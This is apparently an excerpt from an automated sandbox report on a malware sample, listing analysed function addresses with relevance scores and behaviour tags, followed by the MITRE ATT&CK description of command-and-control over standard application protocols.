DNS Answers

HTTPS Packets

Code Manipulations

Function 00432740, Relevance: 6.1, APIs: 4, Instructions: 63
COMMON

Function 00409A06, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Function 00433712, Relevance: 35.3, APIs: 4, Strings: 16, Instructions: 341
windowregistryCOMMON

Function 0041892F, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 99
COMMON

Function 004329E7, Relevance: 15.1, APIs: 10, Instructions: 99
memoryCOMMONLIBRARYCODE

Function 00431F87, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65
registryCOMMON

Function 0041CBB0, Relevance: 9.0, APIs: 6, Instructions: 35
COMMON

Function 00431642, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 39
COMMON

Function 004320CD, Relevance: 7.6, APIs: 5, Instructions: 89
registryCOMMON

Function 00408838, Relevance: 6.1, APIs: 4, Instructions: 53
memoryCOMMONLIBRARYCODE

Function 00432061, Relevance: 4.5, APIs: 3, Instructions: 42
registryCOMMON

Function 00403750, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 80
COMMON

Function 00405159, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30
memoryCOMMONLIBRARYCODE

Function 00431BAD, Relevance: 3.1, APIs: 2, Instructions: 107
windowCOMMON

Function 0042D65F, Relevance: 3.1, APIs: 2, Instructions: 71
windowCOMMON

Function 0042D44C, Relevance: 3.1, APIs: 2, Instructions: 64
windowCOMMON

Function 0041E873, Relevance: 3.1, APIs: 2, Instructions: 56
COMMON

Function 0043201B, Relevance: 3.0, APIs: 2, Instructions: 33
registryCOMMON

Function 00433B55, Relevance: 3.0, APIs: 2, Instructions: 32
COMMON

Function 0041DA3F, Relevance: 3.0, APIs: 2, Instructions: 30
COMMON

Function 0041C021, Relevance: 3.0, APIs: 2, Instructions: 27
threadCOMMON

Function 004190CA, Relevance: 3.0, APIs: 2, Instructions: 27
COMMON

Function 00418D00, Relevance: 3.0, APIs: 2, Instructions: 25
threadCOMMON

Function 0040815F, Relevance: 3.0, APIs: 2, Instructions: 20
memoryCOMMON

Function 0042192F, Relevance: 1.7, APIs: 1, Instructions: 155
COMMON

Function 0041868C, Relevance: 1.6, APIs: 1, Instructions: 73
COMMON

Function 00418D8E, Relevance: 1.6, APIs: 1, Instructions: 72
COMMON

Function 0042B58B, Relevance: 1.6, APIs: 1, Instructions: 55
COMMON

Function 0041C702, Relevance: 1.5, APIs: 1, Instructions: 14
COMMON

Function 004088E9, Relevance: 1.3, APIs: 1, Instructions: 85
memoryCOMMONLIBRARYCODE

Function 00406991, Relevance: 1.3, APIs: 1, Instructions: 56
memoryCOMMONLIBRARYCODE

Function 0043291C, Relevance: 1.3, APIs: 1, Instructions: 11
memoryCOMMONLIBRARYCODE

Description:	Adversaries may communicate using a common, standardized application layer protocol such as HTTP, HTTPS, SMTP, or DNS to avoid detection by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre